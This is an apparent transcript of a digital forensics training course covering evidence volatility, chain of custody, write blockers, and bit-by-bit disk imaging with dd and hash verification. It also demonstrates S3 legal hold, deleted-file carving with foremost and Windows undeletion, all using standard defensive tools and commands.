Then we have to consider the order of volatility. Some computer components and activities are more volatile
than others, and we want to make sure that we gather or copy the most volatile items first. So it's about the
order of evidence gathering, and it also deals with the dependency on electricity. Starting with CPU registers
and cache, the central processing unit, or the brain of the computer, is very volatile. It's got limited amounts of
memory for its cache, and so it can be overwritten often. So that would be the first thing that we would want to
use our tools against to acquire data. Next would be memory contents. Now, that requires electricity. But
again, there's a limited amount of memory. We don't want it to be overwritten and lose something that
potentially could have served as incriminating evidence. Then there's temporary file systems on machines and
non-volatile storage such as permanent storage. That would be the last thing you would acquire data from.
Because even if the power goes out on a device or a battery fails, you don't have to worry about it. The data is
still retained because it's persistent. Now, there's so much that can be learned by looking at something like
memory contents. That might include things like drive mappings to other network locations, routing table
entries, DNS client resolver information, and so on.
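To make this more concrete, here is a minimal live-response sketch, not taken from the video, showing the kind of commands a technician might run on a live Linux host to capture the most volatile items first. The collection path /mnt/evidence is an assumption, and a full RAM capture would normally use a dedicated tool before any disk imaging.

OUT=/mnt/evidence/$(hostname)-$(date +%Y%m%dT%H%M%S)   # hypothetical collection folder on external media
mkdir -p "$OUT"
date                 > "$OUT/collection_time.txt"       # record when collection started
ps aux               > "$OUT/processes.txt"             # running processes (memory-resident state)
ss -tanp             > "$OUT/connections.txt"           # current network connections
ip route show        > "$OUT/routing_table.txt"         # routing table entries
ip neigh show        > "$OUT/arp_cache.txt"             # ARP/neighbor cache
cat /etc/resolv.conf > "$OUT/dns_resolver.txt"          # DNS client resolver information
mount                > "$OUT/mounted_filesystems.txt"   # drive and network mappings
# Persistent storage (disk partitions) is imaged last, since it survives power loss.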
Evidence gathering is the responsibility of digital forensic technicians. And in some cases, that might be the
first responders when it comes to digital or cybersecurity incidents. It's important to always work from a copy
of the digital data. And we do that by imaging or cloning source storage devices. We can even enable write-
blocking to prevent changes to the original source data. Write-blocking can be in the form of a hardware
device, or it can be a software component that prevents writing back to the original source data. Some
examples of gathering evidence would include immediately turning off a suspect mobile phone and removing
its batteries.
Now, depending on what it is that you're trying to gather, you want to be careful with this. If the primary
purpose here is to make sure that nothing can be sent from the phone or to it, then this might be acceptable. But
at the same time, we want to make sure that if needed, we capture a copy of the memory contents of that
mobile device before it's powered off. So the exact actions that are taken will depend on the specific
circumstances. You might use a faraday bag around a device. A faraday bag essentially shields it so that
wireless transmissions are no longer possible. Such as a remote malicious user trying to send a command to
wipe sensitive data or incriminating data.
We might even go old school and take photographs of equipment and computer screens very quickly in case
power goes out. A lot of malicious users will set trip wires on computing equipment if they know they're
performing illegal activity. So that if a device is plugged into a USB port to gather forensic data, that might
trigger the machine to destroy itself or wipe data. So we have to be aware of this. Another important aspect of
digital forensic evidence gathering might be to look at scanner or printer document history. Or even something
as simple as seeing the last physical paper document that was scanned in a scanning device. Another example
would be acquiring security camera footage. So that we might be able to put someone at a specific location at a
certain time, which could be used as evidence in a court of law.
[Video description begins] Topic title: Chain of Custody. The presenter is Dan Lachance. [Video description
ends]
The chain of custody is relevant to digital forensics but it's not exclusive to digital forensics. When we talk
about chain of custody, we are talking about exactly how evidence is gathered at a scene. How the evidence is
stored. So the location and having a log of who has access to it. And all of these items together comprise the
chain of custody. There is a lot of weight placed on adhering to proper chain of custody rules for evidence
admissibility in a court of law. So, this is very important but at the same time, the laws that govern this will
really vary from one region of the world to another. So it's important as a cybersecurity analyst to be well-
versed in how chain of custody rules work in a specific region. Evidence storage is always important, such as
the acquisition of storage devices, or smartphones, or routers, or disk arrays.
One aspect is to use antistatic bags. In other words, to protect the data stored on a removable device from
static electricity. Using detailed labeling on devices for tracking and auditing purposes. Having
an evidence access log. So evidence might be stored in a secured facility somewhere for a period of time, but
who had access to it? Climate-controlled storage rooms are especially important for digital equipment. To
make sure that the equipment can be started in the future if needed, or that data can be pulled off of storage
devices in the future. We also have to think about the internal batteries, which are used to retain things like the
date and time for long-term stored items like laptop computers. So that is going to be something to consider
when working with the acquisition and subsequent storage of digital evidence.
[Video description begins] Sample Chain of Custody Form [Video description ends]
It's important that the chain of custody be adhered to. And here's an example of a sample form. Where we can
see at the top-left, things must be filled in. Such as the case number, the offense type, the first responder ID,
the suspect ID, date and time, location. And then down below, for each piece of evidence we would have a
label number, a date and time of when it was exactly gathered. Having a release and a receive ID when it
comes to stored evidence that might be checked out by investigators for example. And then also a location and
comments field. This is just an example of what types of things need to be logged with chain of custody. But
remember it will vary from one region to another.
[Video description begins] Topic title: Digital Forensics Hardware. The presenter is Dan Lachance. [Video
description ends]
The acquisition of digital evidence requires not only the possession of the right equipment, but the knowledge
of how to use it correctly, in accordance with rules related to the chain of custody. So law enforcement and
private investigation firms will have digital forensics analysts that have a specific dedicated digital forensics
workstation. Whether that's something that can be taken on-site, onto a scene in the form of a specially
configured laptop, or even a high-powered desktop PC back in the office. One component is a hard drive
imaging machine. A hard drive imaging machine or component allows you to copy the contents of one hard
disk to another while not making any changes. While not modifying in any aspect the source information,
which is important when it comes to chain of custody.
Now, hard drive imaging hardware is faster than software drive imaging tools. That's usually the case with
hardware. If it's a dedicated piece of hardware that does one task, it's usually faster and more stable than its
software equivalent. There's usually a trade-off. And in this context, the trade-off is that the hard drive imaging
hardware component might not be compatible with all of the newer drives and their disk interfaces. Now
compare that with software drive imaging tools that run as an app within an operating system, like Windows or
Linux. As long as Windows or Linux can see that storage device, so can the drive imaging tool. So you have to
gauge which is more relevant, or perhaps use a hybrid of both. There are also numerous mobile device
acquisition tools, such as those that plug into a USB port on a smartphone to retrieve data, maybe from the
SIM card on the phone, and so on.
[Video description begins] External Hardware Write Blocker [Video description ends]
An external hardware write blocker sits between the suspect storage device and the digital forensic
workstation. The hardware write blocker is a physical device that provides only read access to the suspect
storage device. It's very important with the chain of custody that nothing about the original storage device
itself, as well as the files stored on it, is modified. So the write blocker then will have connectors for power and
data to link to the suspect storage device. Then there's a data cable linking the write blocker component to the
digital forensic workstation. Whether that's an eSATA cable, USB, SATA, Firewire, whatever it is. So at this
point, from the digital forensic workstation, the suspect storage device can be mounted and copied over. While
ensuring that nothing has been modified on the suspect storage device. All of this needs to be documented. The
ID or name of the person performing these tasks, date and timestamps for all aspects of it, the equipment being
used, and the techniques being used.
[Video description begins] Topic title: Digital Forensics Software. The presenter is Dan Lachance. [Video
description ends]
A digital forensics analyst will have both the correct hardware and software in place to properly gather
evidence. Now the software will be installed on a dedicated digital forensic workstation, whether that's a laptop
or a desktop. Now one of the things that might be installed is software for hard drive imaging. Essentially to
take an entire copy of a suspect's hard drive and have another copy on which analysis is then performed. Also
there will be data recovery tools, such as those that might be used to analyze a web browser cache or a disk
partition looking for previously deleted files. There's also software tools on the forensic workstation that might
be used to capture the contents of memory on a suspect device, while it's still running. Whether it's a
smartphone, tablet, server, desktop, whatever the case might be. And then to analyze those memory dumps or
image files.
[Video description begins] Software Disk Image Acquisition [Video description ends]
Software disk image acquisition begins with the forensic workstation having the appropriate software. Pictured
in the diagram, we can see that there is a write blocker device sitting between the forensic workstation and the
suspect storage device. Now in this example, the write blocker is physical, although it could come in software
form. Hardware is usually much more reliable. So the write blocker then has power and data connections to the
suspect storage device and a data connection to the forensic workstation. The purpose of the write blocker is to
prevent the forensic workstation from writing or making any change at all to the suspect storage device.
Because that would violate chain of custody.
[Video description begins] The write blocker has read-only access to suspect storage device. [Video
description ends]
So the suspect disk partitions then are mounted and made available on the digital forensic workstation in read-
only mode. Next, the technician would acquire a disk image of the suspect storage device using a tool. There are plenty
of tools out there like AccessData FTK Imager, which would allow you to take an image of either the entire
physical device or a logical drive or a folder on it. Then a unique hash of the drive contents is generated for the
suspect storage device. But it's not written there because we don't want to make any writes to the disk. But it is
taken from what is there. Then we can generate a unique hash of the acquired data. And if we have identical
hashes, it means the copy is accurate. After we make sure we have a forensically sound hash of the copied
data, then we can perform an analysis on it. And all of this needs to be documented thoroughly to remain
compliant with chain of custody. And then there's the issue of hard-to-get-at or inaccessible data, such as on
smartphones.
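As a rough illustration of the software side of write-blocking, here is a minimal sketch, not a step from the video, under the assumption that the suspect device shows up as /dev/sdb on a Linux forensic workstation and /mnt/suspect is an arbitrary mount point:

blockdev --setro /dev/sdb          # ask the kernel to treat the whole device as read-only
blockdev --getro /dev/sdb          # verify; prints 1 when the read-only flag is set
mkdir -p /mnt/suspect
mount -o ro /dev/sdb1 /mnt/suspect # if a partition must be browsed, mount it read-only

A hardware write blocker is still generally preferred for chain of custody, since a software flag depends on the operating system honoring it.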
[Video description begins] Inaccessible Data [Video description ends]
So if we've got a suspect phone that is locked and they are unwilling to unlock the phone, then what can we
do? Because in some cases, the contents of the phone might be wiped after a certain number of incorrect
passcode attempts. So then we have to think about passwords. In some cases, you might be
able to brute-force passwords for some devices. But, again, that's only as good as knowing how many times an
incorrect password can be entered before the device is wiped. Then there's encryption. What if a passphrase is
required to decrypt the contents or some portion of the contents of a mobile device? What if that's not
supplied? There have been many situations in the past where this has come up, where the government
demanded that vendors such as Apple provide a way to get into phones or decrypt data, and companies like
Apple have simply refused. And, of course, mysteriously enough, the government withdraws
its request after a period of time, which usually would be an indicator that they somehow were able to get into
the suspect's device anyways.
During this video, you will learn how to create a hard disk image using the Linux dd command.
Objectives
[Video description begins] Topic title: Linux Disk Volume Imaging. The Presenter is Dan Lachance. [Video
description ends]
You can use the Linux dd command to acquire an image of a disk partition for forensic analysis.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
The first thing I'm going to do here in Linux is take a look at the partitioning of the disk devices on this
machine. Now, in a forensic type of situation, you would probably boot through alternative means to get to the
file system on that machine. So I'm going to go ahead and run fdisk -l. So what we've got here is our first
device /dev/sda, which is about 40 GiB in size.
[Video description begins] The output displays the partitions and details like file system type. [Video
description ends]
Then we've got /dev/sdb, which is about 8 GiB. And sdb has been carved up into a partition here, seen as
/dev/sdb1. So it's pretty much the entire disk.
[Video description begins] In the output, for the device /dev/sdb1 he highlights size 8G. [Video description
ends]
What I want to do is make a bit-by-bit copy of sdb1 and store it as an image file for forensic analysis. Now,
the first thing I'll do, though, is generate a unique hash for that partition. And then we'll generate a hash after
we take an image of it. So I'm going to use the clear command to clear the screen.
[Video description begins] He executes the following command: clear. [Video description ends]
I'm going to use sha256sum, which is a built-in Linux command, to generate a unique hash of /dev/sdb1, so
partition one on that device. And I'm going to use the output redirection symbol because, on the root, I want to
make a file called sdb1_orig_hash, and I'll press Enter.
[Video description begins] He executes the following command: sha256sum /dev/sdb1 >
/sdb1_orig_hash. [Video description ends]
So naturally, the size of that disk volume or partition will determine how long this command takes to execute.
[Video description begins] No output displays and the prompt remains the same. [Video description ends]
And before you know it, it's done. So let's use the cat command to view that hash value. So I'll cat
/sdb1_orig_hash, and there's the unique hash value, the sha256 hash for /dev/sdb1.
[Video description begins] He executes the following command: cat /sdb1_orig_hash. The output displays the
content of the /sdb1_orig_hash file. [Video description ends]
Okay, so now we can use the dd command to actually take a copy of that entire disk partition. So I'll use the dd
command in Linux to do that. Space, input file, or if=. So what is it we want to copy? /dev/sdb1. What do we
want to copy it to? So output file, of=. On the root of the file system (which lives on /dev/sda1), I'm going to
create a file, let's say called sdb1.img, for image. And I'm going to go ahead and press Enter.
[Video description begins] He executes the following command: dd if=/dev/sdb1 of=/sdb1.img. The output
displays that content of /dev/sdb1 is copied to /sdb1.img. [Video description ends]
Okay, so it looks like it's completed. So if we do an ls of the root and look for anything with the .img
extension, it looks like we've got our sdb1.img file. I want to run a hash on that.
[Video description begins] He executes the following command: ls /*.img. The output reads: /initrd.img
/sdb1.img /sdb.img. [Video description ends]
So I'm going to run sha256sum, and it's going to be based on the sdb1.img file stored on the root. So let's just
go ahead and run that and see what it returns back to the screen.
[Video description begins] He executes the following command: sha256sum /sdb1.img. The output displays the
sha256 checksum of the /sdb1.img file in the current directory followed by the given filename. [Video
description ends]
And we can see that the hash that was generated here, looks like it is the exact same as the original hash taken.
[Video description begins] He points to the outputs of the following commands: sha256sum /sdb1.img and
cat /sdb1_orig_hash. [Video description ends]
So we know that we've got a forensically sound, bit-by-bit copy of the original source file system that we
can then analyze. So this way, we have a way to determine that nothing was corrupted while things were
copied over. Plus we have a way to determine whether the original file system has been modified.
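For reference, here is the whole workflow condensed into a few commands, with a couple of commonly used GNU dd options added; treat this as a sketch rather than exactly what was typed in the demo:

sha256sum /dev/sdb1 > /sdb1_orig_hash                  # hash the original partition first
dd if=/dev/sdb1 of=/sdb1.img bs=4M status=progress     # bit-by-bit copy; bs speeds it up, status shows progress
# conv=noerror,sync could be added to keep going past read errors, but the zero padding
# it inserts would make the image hash differ from the original if errors occur.
sha256sum /sdb1.img                                    # hash the image
cat /sdb1_orig_hash                                    # the two hash values should match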
[Video description begins] Topic title: Legal Hold Cloud Enablement. The presenter is Dan Lachance. [Video
description ends]
[Video description begins] A web site labeled "aws" opens. It includes drop-down buttons labeled "Services"
and "Resource Groups". A web page labeled "AWS Management Console" is open. It includes tiles labeled
"AWS services" and "Access resources on the go". [Video description ends]
And there are times when you might want to make the contents of S3 buckets, in other words, files stored in
the cloud, immutable, meaning they can't be modified or deleted for a period of time. That also includes legal
hold: you might be instructed by legal counsel to place a legal hold on some items within an S3 bucket so that
they can't be tampered with while there are legal proceedings taking place. So how do we do
this? Let's take a look at it in the AWS Management Console.
[Video description begins] The AWS services tile includes a section labeled "Find Services". The Find
Services section includes a search box. In the search box, he types s3. A list of options appears. He clicks an
option labeled "S3". [Video description ends]
I'm going to search up S3, and I'll click on it to open up the S3 Management Console, where we can see we
already have a number of existing buckets.
[Video description begins] A web page labeled "S3 Management Console" opens. It is divided in two parts:
navigation pane and content pane. The navigation pane includes options labeled "Buckets" and "Batch
operations". The Buckets option is selected and the corresponding page is open in the content pane. It includes
a table and a button labeled "+ Create bucket". The table has four columns and several rows. The column
headers are "Bucket name", "Access", "Region", and "Date created". [Video description ends]
We're going to create a new one for this example. So I'll click Create bucket. It's going to be called
testbucketyhz.
[Video description begins] He clicks the + Create bucket button. A wizard labeled "Create bucket" opens. It
contains four steps labeled "Name and region", "Configure options", "Set permissions", and "Review". The
Name and region option is selected and the corresponding page is open. It includes a text box labeled "Bucket
name" and a drop-down list box labeled "Region". [Video description ends]
[Video description begins] In the Bucket name text box, he types testbucketyhz. [Video description ends]
Now, one of the things I'm interested in doing here is scrolling down as I create this bucket.
[Video description begins] In the Region drop-down list box, an option labeled "US East (N. Virginia)" is
selected. He points to the Region drop-down list box. [Video description ends]
[Video description begins] A page labeled "Properties" opens. It includes a section labeled "Advanced
settings". [Video description ends]
[Video description begins] He expands the Advanced settings section. It contains a checkbox labeled
"Permanently allow objects in this bucket to be locked". [Video description ends]
It says, it requires versioning to be enabled. Well, that's just at the top of this page here. So let's turn on
Versioning, which is designed to keep multiple versions of objects stored in S3.
[Video description begins] He selects a checkbox labeled "Keep all versions of an object in the same
bucket". [Video description ends]
So, for example, if you had an Excel document and you made a change and saved it here, you could also
access the previous version. However, that's not why we're turning on Versioning, we're turning it on because
we want Object lock to be enabled. So I'm going to turn on Object lock.
[Video description begins] He selects the Permanently allow objects in this bucket to be locked
checkbox. [Video description ends]
So all we're doing here is turning on the ability to lock the contents of the bucket.
[Video description begins] The Configure options step gets selected. He clicks a button labeled "Next". The Set
permissions step gets selected. He clicks a button labeled "Create bucket". He switches to the S3 Management
Console web page. [Video description ends]
As a matter of fact, it won't be turned on, just the capability will be enabled.
[Video description begins] He clicks the testbucketyhz entry and the corresponding page opens. It includes
tabs labeled "Overview", "Properties", and "Permissions". The Overview tab is selected and the
corresponding tab is open. [Video description ends]
So I'm going to go ahead and click Next to proceed through the wizard with all of the rest of the defaults until
we see our newly created bucket.
[Video description begins] He clicks the Properties tab and the corresponding tab opens. It includes a section
labeled "Advanced settings". The Advanced settings section includes tiles labeled "Object lock" and
"Tags". [Video description ends]
[Video description begins] The Object lock tile includes radio buttons labeled "Enable governance mode",
"Enable compliance mode", and "None". [Video description ends]
If I click on the bucket, and if I go into the Properties of it, and if I scroll all the way down, under Advanced
settings and click on Object lock, we can see we have a number of options for something called governance
mode and compliance mode, and it's currently set to None.
[Video description begins] He selects the Enable governance mode radio button and a text box labeled
"Retention period" appears. It contains the value "1". [Video description ends]
Now here, if we enable governance mode, objects will be locked by default for a retention period of one day.
[Video description begins] He points to the Retention period text box. [Video description ends]
However, it can be disabled by anyone that's got the specific IAM permissions to turn this off.
[Video description begins] He selects the Enable compliance mode radio button. [Video description ends]
However, we've got compliance mode here that we could enable, for example, if we wanted to set a lock on the
contents of the bucket for one day.
[Video description begins] He points to the Retention period text box. [Video description ends]
We can change that value; one day is just the default. Then compliance mode means nobody can disable the
lock; you'd have to wait for the retention period to time out. Okay, well, that's interesting.
[Video description begins] He selects the Enable governance mode radio button. [Video description ends]
We're going to Enable governance mode and we're just going to set this, let's say, to five days in this example,
and I'll click Save.
[Video description begins] In the Retention period text box, he alters the value from 1 to 5.[Video description
ends]
Now it says after you do this, you won't be able to delete objects that you upload for five days.
[Video description begins] A dialog box labeled "Confirm governance mode" opens. It includes a text box
labeled "To confirm governance mode, type confirm in the field." and a button labeled "Confirm". [Video
description ends]
Okay, that's fine, I'm going to go ahead and type in confirm, and we'll confirm it.
[Video description begins] In the To confirm governance mode, type confirm in the field. text box, he types
"confirm". He clicks the Confirm button. The Confirm governance mode dialog box closes. [Video description
ends]
So the next thing we're going to do is to go back to this bucket under Overview and upload some content.
[Video description begins] He clicks the Overview tab and the corresponding tab opens. It includes a button
labeled "Upload". He clicks the Upload button. A wizard labeled "Upload" opens. It contains steps labeled
"Select files", "Set permissions", "Set properties", and "Review". [Video description ends]
So I've got a sample text file I'm going to upload. I'm just going to keep going through and accept all of the
defaults, and I'm going to upload it. Then I'm going to select the link for that uploaded file.
[Video description begins] The Select files step is selected and the corresponding page is open. It includes a
file labeled "CardData.txt" and a button labeled "Next". He clicks the Next button. The Set permissions step
gets selected. He clicks the Next button. The Set properties step gets selected. He clicks a button labeled
"Upload". The Upload wizard closes. A table with four columns and one row appears in the Overview tab. The
column headers are Name, Last modified, Size, and Storage class. [Video description ends]
[Video description begins] Under the Name column header, he clicks the CardData.txt entry and the
corresponding page opens. [Video description ends]
And we're going to look at the Object lock settings for this individual file as opposed to at the bucket level.
[Video description begins] He clicks the Properties tab and the corresponding tab opens. [Video description
ends]
When I go into the Object lock here, we can see we have both Enable governance mode and Enable
compliance mode, notice governance mode is turned on.
[Video description begins] He clicks the Object lock tile. It includes sections labeled "Retention mode" and
"Legal hold". The Retention mode section includes radio buttons labeled "Enable governance mode" and
"Enable compliance mode" and a text box labeled "Retain until date". [Video description ends]
The retention date here turns out to be five days beyond what the current date is, when things will be unlocked.
[Video description begins] In the Retain until date text box, he highlights the value 2020-03-14. [Video
description ends]
So we're retaining governance mode until that date.
[Video description begins] In the Retention mode section, he points to a radio button labeled
"Disable". [Video description ends]
However, of course, we can choose Disable because we have permissions to disable it, but we have an
additional option here.
[Video description begins] He points to the Legal hold section. It contains radio buttons labeled "Enable" and
'Disable". [Video description ends]
And this is for an individual file within the S3 bucket. We can enable Legal hold. It says, legal hold would
prevent the object from being deleted regardless of the retention date above. So it's an override. Well, if we've
been instructed to do so, we can Enable Legal hold, so this file can't be removed from the bucket.
[Video description begins] He selects the Enable radio button. [Video description ends]
[Video description begins] He clicks a button labeled "Save". The Object lock tile closes. [Video description
ends]
Now, if I go back into Object lock, then we can see that legal hold has actually been enabled.
[Video description begins] He clicks the Object lock tile and it opens. In the Legal hold section, he points to
the Enable radio button, which is selected. [Video description ends]
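The same configuration can also be scripted with the AWS CLI. The calls below are a sketch using the bucket and file names from this demo; they assume the CLI is installed and configured with credentials that have S3 and Object Lock permissions:

aws s3api create-bucket --bucket testbucketyhz --object-lock-enabled-for-bucket     # creates the bucket with versioning and the lock capability enabled
aws s3api put-object-lock-configuration --bucket testbucketyhz --object-lock-configuration '{"ObjectLockEnabled":"Enabled","Rule":{"DefaultRetention":{"Mode":"GOVERNANCE","Days":5}}}'
aws s3api put-object --bucket testbucketyhz --key CardData.txt --body CardData.txt  # upload the sample file
aws s3api put-object-legal-hold --bucket testbucketyhz --key CardData.txt --legal-hold Status=ON   # place the legal hold on that object
aws s3api get-object-legal-hold --bucket testbucketyhz --key CardData.txt           # confirm the hold is enabled

Swapping GOVERNANCE for COMPLIANCE in the default retention rule would mimic compliance mode, where nobody can remove the lock before the retention period expires.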
In this video, find out how to restore files that have been deleted in Linux.
Objectives
[Video description begins] Topic title: Linux File Recovery. The presenter is Dan Lachance. [Video
description ends]
In this demonstration, we're going to take a look at how to recover deleted files from removable media on a
Linux host.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:/#. [Video description ends]
So to get started here in Linux, we need to figure out what kind of removable media we've got plugged in. So
I've plugged in a USB thumb drive into this machine.
[Video description begins] He executes the following command: fdisk -l. The output displays the partitions and
details like file system type. [Video description ends]
So if I run fdisk -l to list, then I can see that I've got a device here, /dev/sdd. It's a SanDisk Cruzer USB device,
approximately 3.7 GiB in size. I can see down below it's been carved out into one partition, partition one.
So, /dev/sdd1. Let's go ahead and mount that and see what's in it. So I'm going to type in clear. And I'm going
to mount /dev/sdd1 to a directory on the root of this machine that I've previously created called ext_drive, for
external drive.
[Video description begins] He executes the following command: mount /dev/sdd1 /ext_drive/. No output
displays and the prompt remains the same.[Video description ends]
[Video description begins] He executes the following command: ls /ext_drive/. The output displays a list of
files and directories. [Video description ends]
However, those aren't the files we're looking to recover, because we can already see them. We're talking about
recovering previously deleted files, even if that device has been re-partitioned. So in order to do that, we have
to use a special tool.
[Video description begins] He executes the following command: clear. [Video description ends]
And the tool that we're going to use in this particular case is going to be one that's included automatically with
Kali Linux called Foremost. So I'm going to run the foremost command, foremost -i. So, the device I want to
point to here is /dev/sdd. I'm not going to put in the 1 for a partition, because I don't know how the thing was partitioned in the
past. I want to try to recover whatever I can, -v for verbose and -o for output location. I've got a folder that I've
created already previously on the root called recovered_files. So I'm going to go ahead and tell it that I want to
use that as an output folder.
[Video description begins] He executes the following command: foremost -i /dev/sdd -v -o /recovered_files.
The output displays the information of /dev/sdd. [Video description ends]
And when I press Enter, we can now see it's begun taking a look at the contents of that external drive. And
because we asked for -v, verbose output, we can see it's working as it goes. When it's finished,
we'll have a little summary, and then we can take a look at the recovered_files folder to see what's in it. We can
now see it's in the midst of recovering a number of JPG files. Once the output is complete from the foremost
command, we can scroll up and get a bit of a summary. In terms of the number of files that were extracted and
the number per file type, notably a lot of JPG files here.
[Video description begins] In the output, he highlights 2145 FILES EXTRACTED. Also, he highlights the
number of files per type. The types of files include jpg, gif, and zip. [Video description ends]
And so, we can clear the screen and change directory to our output location, the /recovered_files folder, and do
an ls.
[Video description begins] He executes the following command: cd /recovered_files/. No output displays and
the prompt changes to root@kali:/recovered_files#. [Video description ends]
[Video description begins] He executes the following command: ls. The output displays a list of files and
directories. [Video description ends]
[Video description begins] He executes the following command: cd jpg. No output displays and the prompt
changes to root@kali:/recovered_files/jpg#. [Video description ends]
Then we can do an ls, for example, ls -l, long listing of all of the files here.
[Video description begins] He executes the following command: ls -l. The output displays a list of files and
directories in long list format. [Video description ends]
And you can see that there's a variety of different file sizes for each of these JPG files.
[Video description begins] He executes the following command: clear. He executes the following command:
cd... No output displays and the prompt changes to root@kali:/recovered_files#. He executes the following
command: clear. He executes the following command: ls. The output displays a list of files and
directories. [Video description ends]
So at this point, it's a matter of using the appropriate tools to further analyze the contents of what was
recovered from the previously deleted file systems on the removable USB thumb drive.
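To summarize the carving step, here is the foremost invocation from the demo along with a couple of optional variations; the paths are examples, and foremost expects the output directory to be empty or not yet exist:

foremost -i /dev/sdd -v -o /recovered_files             # carve every file type foremost recognizes, verbosely
cat /recovered_files/audit.txt                          # per-type summary of what was carved
foremost -t jpg,pdf -i /dev/sdd -o /recovered_jpg_pdf   # optionally restrict carving to specific file types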
[Video description begins] Topic title: Windows File Recovery. The presenter is Dan Lachance. [Video
description ends]
Normally when you delete a file in Windows, it shows up in the Recycle Bin.
[Video description begins] He clicks the Recycle Bin icon. The file explorer window opens. It is divided in two
parts: navigation pane and content pane. The navigation pane includes options labeled "Downloads" and
"Pictures". [Video description ends]
Unless you've emptied the Recycle Bin or you've deleted a file, for example, while holding down the Shift key
to bypass the Recycle Bin. Now even though it doesn't appear, the file is still on disk, and it can be retrieved
using the right tools. As long as the disk hasn't been completely overwritten with random characters, you might be
able to get it back. So I'm going to go here to my Downloads folder, where I've got a file undeletion tool here.
[Video description begins] He clicks the Downloads option and the corresponding subfolder opens. It contains
folders labeled "FileUndelete" and "HardDiskScrubber_34". He clicks the FileUndelete folder and the
corresponding subfolder opens. It includes an application labeled "Restoration". [Video description ends]
Go ahead and run the program. And I'm going to tell it to show me deleted files on drive D on this host.
[Video description begins] He clicks the Restoration application. A dialog box labeled "Restoration Version
3.2.13" opens. It is divided in two parts. The first part contains a table with several columns and no rows. The
column headers include Name and Size. The second part includes a drop-down list box labeled "Drives", a
button labeled "Search Deleted Files", a text box labeled "All or part of the file", and a button labeled
"Restore by Copying".[Video description ends]
[Video description begins] In the Drives drop-down list, he selects an option labeled "New volume
(D:)". [Video description ends]
Now I could put in a filter here, but I want to see them all.
[Video description begins] He points to the Search Deleted Files button. [Video description ends]
So here I now see a listing of all of the deleted files from this disk volume.
[Video description begins] He points to the All or part of the file text box and clicks the Search Deleted Files
button. The table gets populated. [Video description ends]
And I can see, for example, at the very top, even the file name is available, and the original location of it.
[Video description begins] He points to the Name and In Folder columns. He highlights a row where entries
under the Name and In Folder column headers are CreditCardData.txt and D:\SampleFiles
respectively. [Video description ends]
So I've got a file here called CreditCardData that used to exist on drive D under SampleFiles.
[Video description begins] In the navigation pane, he clicks an option labeled "New volume (D:)" and the
corresponding subfolder opens. It includes folders labeled "Budgets" and "SampleFiles". [Video description
ends]
Now if we go to drive D, look under SampleFiles, there's nothing here called CreditCardData.
[Video description begins] He clicks the SampleFiles folder and the corresponding subfolder opens. It
includes a file labeled "CustomerTransactions.xslx". [Video description ends]
And as we saw, the Windows Recycle Bin was empty. Let's go ahead and try to restore this.
[Video description begins] He switches to the Restoration Version 3.2.13 dialog box. The row where entries
under the Name and In Folder column headers are CreditCardData.txt and D:\SampleFiles respectively is
selected. [Video description ends]
So I selected that file, and I'm going to go ahead and choose Restore by Copying. Now there are a lot of tools out there
that will let you recover only a certain amount of data if you're running it in trial mode, until you actually
purchase a subscription. So in this case, I'm just going to click Restore by Copying.
[Video description begins] A dialog box labeled "Save As" opens. It is divided in two parts: navigation pane
and content pane. The navigation pane includes options labeled "Downloads" and "Desktop". [Video
description ends]
It wants to know where to restore it. Why don't we put it directly in the Downloads folder?
[Video description begins] He clicks the Downloads option. A text box labeled "File name" contains the value
CreditCardData. He clicks a button labeled "Save". The Save As dialog box closes. [Video description ends]
[Video description begins] He closes the Restoration Version 3.2.13 dialog box. [Video description ends]
[Video description begins] In the file explorer window, he clicks the Downloads option and the corresponding
subfolder opens. It includes a file labeled "CreditCardData". [Video description ends]
[Video description begins] He clicks the CreditCardData file and the corresponding file opens in
Notepad. [Video description ends]
So given the right tools and access to a disk volume, it doesn't take very much knowledge or effort to recover
deleted files.
[Video description begins] Topic title: Linux File System Mounting. The presenter is Dan Lachance. [Video
description ends]
As part of evidence gathering with digital forensics, there are times when you may want to make a copy of a
Linux disk partition.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
And then analyze it later. So let's take a look at an existing Linux environment here. If I do an ls of the root of
the file system looking for files that end with img, I can see I've got a file called sdb1.img.
[Video description begins] He executes the following command: ls /*.img. The output reads: /initrd.img
/sdb1.img /sdb.img.[Video description ends]
Now that references the fact that we've got the second disk device on a Linux system, sdb, and partition 1.
[Video description begins] In the output, he highlights /sdb1.img. [Video description ends]
That was copied, presumably using the dd command, into an image file. Now, the file extension doesn't hold the same relevance here in Linux as it does in Windows; it doesn't really matter whether there's a file extension or not. The key is that we need to be able to generate a hash value of that image to determine whether we're working with the exact same file system contents as the original. So we can do that by running sha256sum, in this case against that file. When we do that, we can see what the returned value is and compare it against the sha256sum value produced from the original file system.
[Video description begins] He executes the following command: sha256sum /sdb1.img. [Video description
ends]
If they're the same, it means we have an exact bit-by-bit copy. Otherwise, if they're different, it means
something has changed.
[Video description begins] The output displays the checksum followed by the /sdb1.img file name. He points to
the alphanumeric checksum. [Video description ends]
So we can now see we have a unique SHA256 hash value of that image file. And we could actually compare
that to what might have been recorded of the original source location. In other words, the original hash of the
original real file system. I've got that here, I'm going to cat that, it's on the root. It's called sdb1_orig_hash.
[Video description begins] He executes the following command: cat /sdb1_orig_hash. The output displays the
content of the /sdb1_orig_hash file. [Video description ends]
And sure enough, the hashes match. So I know I've got a valid copy of that.
[Video description begins] He points to the outputs of sha256sum /sdb1.img and cat /sdb1_orig_hash
commands. [Video description ends]
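To summarize that verification step as a quick reference, a minimal command sketch might look like the following, assuming the original hash was recorded into /sdb1_orig_hash at acquisition time (the file names here are just the ones from this demo):

sha256sum /sdb1.img    # hash of the acquired image
cat /sdb1_orig_hash    # hash recorded from the original partition

# Optional scripted check: compare only the hash fields of the two values
[ "$(sha256sum /sdb1.img | awk '{print $1}')" = "$(awk '{print $1}' /sdb1_orig_hash)" ] \
  && echo "MATCH" || echo "MISMATCH"

If the two values are identical, the image is a bit-for-bit copy of the original evidence.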
Now, to be able to get into that image of that Linux file system, I need to mount it so I can start to examine it.
So in order to do that, I'm going to make a directory. And I'm going to create it on the root here. So I'm going
to create it using the mkdir command. And I'm going to call it analyze.
[Video description begins] He executes the following command: mkdir /analyze. No output displays and the
prompt remains the same. [Video description ends]
And I'm going to mount that device into the analyze folder.
[Video description begins] He executes the following command: mount. No output displays and the prompt
remains the same.[Video description ends]
[Video description begins] He executes the following command: ls /analyze. No output displays and the
prompt remains the same. [Video description ends]
